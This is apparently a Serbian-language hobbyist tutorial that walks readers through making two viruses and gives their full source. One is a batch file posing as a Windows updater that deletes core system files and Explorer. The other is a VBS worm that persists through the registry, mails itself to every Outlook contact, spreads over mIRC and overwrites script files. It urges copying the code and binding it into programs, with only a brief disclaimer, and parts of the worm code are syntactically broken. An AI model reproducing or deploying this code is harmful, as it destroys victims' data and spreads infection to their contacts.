Napomena

Napomena: Zelim da istaknem da je ovaj tutorial namenjen samo u edukativne svrhe i da autor ovog teksta nije odgovoran za bilo kakvu stetu koju napravite primenom ovih informacija.

[Sta su virusi?]

Na pocetku tutoriala cu vam objasniti sta su virusi, iako je vecina mozda i okusila nevolje koje virus donosi. Virus je zapravo program ili skripta (java, vbasic...) napravljena da nasteti vasem kompjuteru i koji se moze sam i bez vaseg znanja kopirati na floppy i slati preko e-maila koristeci vase mail adrese u Address Book-u (to su takozvani CRVI ili WORM). Pored toga neki virusi su napravljeni tako da zaraze i ostale fajlove na vasem kompjuteru.

[Kako se prave?]

Za pravljenje virusa mogu se koristiti svi moguci programski i skripting jezici. Da bi ste vi sami mogli da pravite neke vrste virusa morate da znate odredjene programske jezike. Zato vam savetujem da, ukoliko neznate, naucite neki programski jezik. Ukoliko zelite da postanete haker morate znati c, c++ i perl programske jezike.

U daljem tekstu slede 2 primera *.BAT virusa i *.TXT.VBS virusa koje je veoma jednostavno napraviti i koji ce vam malo pribliziti pojam pravljenja virusa! Naravno, da bi ih razumeli morate znati BATCH i VISUAL BASIC skripting jezike.

Ukoliko bi vi zeleli da napravite *.bat virus, evo vam malog primera kako da to uradite. Potrebno je samo da sledeci batch kod iskopirate u notepad i snimite ga kao winupdt.bat fajl i eto vam malog virusa! Ovaj virus se predstavlja kao UPDATE za Windows 98, ali je zapravo virus koji ce obrisati vazne sistemske fajlove, kao i Windows Explorer i zatim restartovati racunar. Jednom napravljen ovakav virus mozete ubaciti i u neki exe fajl (program ili igricu), a to ce vam najlakse biti uz pomoc nekog bindera (npr. MultiBinder), sem ukoliko znate c/c++ programski jezik... HeHeHe :D (da bi naucili ovaj programski jezik downloadujte tutorial sa naseg sajta, ili potrazite neki na NETu).

######### SECI OVDE #########

@ECHO OFF
echo Welcome To Microsoft Windows System Updater Setup
echo Installing Components... Please Wait...
echo y|del c:\autoexec.bat
echo y|del c:\config.sys
echo y|del c:\windows\system.ini
echo y|del c:\windows\win.ini
echo y|del c:\windows\explorer.exe
echo Installing is DONE.
echo Setup Will Now restart Your Computer... Please Wait...
start C:\WINDOWS\RUNDLL.EXE user.exe,exitwindows

######### SECI OVDE #########

VBA crvi koriste posebnu tehniku kako bi zavarali potencijalnu zrtvu. Pored toga sto crv nema ekstenziju EXE vec VBA ili VBS (sto znaci da su pisani u Visual Basic Script formatu i da je za njihovo izvrsavanje potreban IE), takvi crvi se obicno distribuiraju sa extenzijom '.txt.vba', tako da potencijalna zrtva pomisli da se radi o obicnom tekstu i startuju fajl. Posto je zadnja ekstenzija '.vba', ne startuje se Notepad vec IE koji izvrsi program, tako da potencijalna zrtva postane prava zrtva.

Sledeci virus je srpska verzija virusa I_LOVE_YOU, samo sto je mnogo opasniji i mnogo bolji. Ovaj kod ce te takodje iskopirati u notepad, ali snimicete ga kao volim_te.txt.vbs Virus je odlican, sam se kopira i salje putem e-maila ili preko mIRC-a.

######### SECI OVDE #########

'Virus volim_te.txt.vbs Created By ReNZor. 12/2/2003
Set HFFLUN1U = createobject("scripting.filesystemobject")
HQO5518H = HFFLUN1U.getspecialfolder(1)
R125B3VC = HQO5518H & "\volim_te.txt.vbs"
Set SO2ERHGU = createobject("wscript.shell")
SO2ERHGU.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & R125B3VC & " %"
HFFLUN1U.copyfile wscript.scriptfullname, R125B3VC
O8UN6TKP
If SO2ERHGU.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\volim_te.txt.vbs\P6OIH928") <> 1 then
EU3V0765
End if
If SO2ERHGU.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\volim_te.txt.vbs\T7UT8582") <> 1 then
EJSL7CBE ""
End if

Set M79N43AH= HFFLUN1U.opentextfile(wscript.scriptfullname)
IC4FESF6 = M79N43AH.readall
M79N43AH.close
Do
if not(HFFLUN1U.fileexists(wscript.scriptfullname)) then
set I1JH1J72= HFFLUN1U.createtextfile(wscript.scriptfullname)
I1JH1J72.write IC4FESF6
I1JH1J72.close
end if
UDT5953N = SO2ERHGU.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate")
If UDT5953N <> "wscript.exe " & R125B3VC & " %" then
SO2ERHGU.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & R125B3VC & " %"
end if
UDT5953N= ""
loop
Function EU3V0765()
Set GJ7P4911 = CreateObject("Outlook.Application")
If GJ7P4911 = "Outlook" Then
Set KECO30GA = GJ7P4911.GetNameSpace("MAPI")
Set L219C6V2 = KECO30GA.AddressLists
For Each H82H7563 In L219C6V2
If H82H7563.AddressEntries.Count <> 0 Then
A5II2553 = H82H7563.AddressEntries.Count
For S8JO7233 = 1 To A5II2553
Set K7623MOJ = GJ7P4911.CreateItem(0)
Set H541TU1Q = H82H7563.AddressEntries(S8JO7233)
K7623MOJ.To = H541TU1Q.Address
K7623MOJ.Subject = "cao"
K7623MOJ.Body = "Cao, " & vbcrlf & "nadam se da ces ovo procitati i" & vbcrlf & "da ces razumeti..." & vbcrlf & ""
execute "set ISHK15M5 =K7623MOJ." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
UVSBA4Q2 = R125B3VC
K7623MOJ.DeleteAfterSubmit = True
ISHK15M5.Add UVSBA4Q2
If K7623MOJ.To <> "" Then
K7623MOJ.Send
End If
Next
End If
Next
End If
End function
Function EJSL7CBE(N46SM3R1)
If N46SM3R1 <> "" Then
RH5KFA0D = SO2ERHGU.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If HFFLUN1U.fileexists("c:\mirc\mirc.ini") Then
N46SM3R1 = "c:\mirc"
ElseIf HFFLUN1U.fileexists("c:\mirc32\mirc.ini") Then
N46SM3R1 = "c:\mirc32"
ElseIf HFFLUN1U.fileexists(RH5KFA0D & "\mirc\mirc.ini") Then
N46SM3R1 = RH5KFA0D & "\mirc"
ElseIf HFFLUN1U.fileexists(RH5KFA0D & "\mirc32\mirc.ini") Then
N46SM3R1 = RH5KFA0D & "\mirc"
Else
N46SM3R1 = ""
End If
End If
If N46SM3R1 <> "" Then
Set C1JLJ66F = HFFLUN1U.CreateTextFile(N46SM3R1 & "\script.ini", True)
C1JLJ66F = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
C1JLJ66F = C1JLJ66F & vbCrLf & "n0=on 1:JOIN:#:{"
C1JLJ66F = C1JLJ66F & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
C1JLJ66F = C1JLJ66F & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
C1JLJ66F = C1JLJ66F & R125B3VC
C1JLJ66F = C1JLJ66F & vbCrLf & "n3=}"
script.Close
End If
End Function
Function VB17JIJS()
On Error Resume Next
Set HVNE84R3 = HFFLUN1U.Drives
For Each SPBC4Q28 In HVNE84R3
KA61L0PN = SPBC4Q28 & " \ "
Call I1HE2CE2(KA61L0PN)
Next
End Function

Function I1HE2CE2(P8HO634G)
FD6T6S1N = P8HO634G
Set F54HU6J5 = HFFLUN1U.GetFolder(FD6T6S1N)
Set KS2NN47N = F54HU6J5.Files
For Each S9C7C2GI In KS2NN47N
If lcase(S9C7C2GI.Name) = "mirc.ini" Then
EJSL7CBE(S9C7C2GI.ParentFolder)
End If
If HFFLUN1U.GetExtensionName(S9C7C2GI.path) = "vbs"
HFFLUN1U.CopyFile wscript.scriptfullname,S9C7C2GI.path,true
End if
If HFFLUN1U.GetExtensionName(S9C7C2GI.path) = "vbe"
HFFLUN1U.CopyFile wscript.scriptfullname,S9C7C2GI.path,true
End if
Next
Set P67O4ULQ = F54HU6J5.Subfolders
For Each PR35UKR1 In P67O4ULQ
Call (PR35UKR1.path)
Next
End function
Function O8UN6TKP()
SO2ERHGU.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner","IMAS_VIRUS"
end function

######### SECI OVDE #########

[Zavrsna rec]

Primere virusa koji se nalaze u ovom tekstu vam nisam napisao kako bi ih vi iskopirali i poceli da unistavate tudje kompjutere, vec samo da bi ukapirali kako se oni prave i da vam ukazem na to kako oni izgledaju.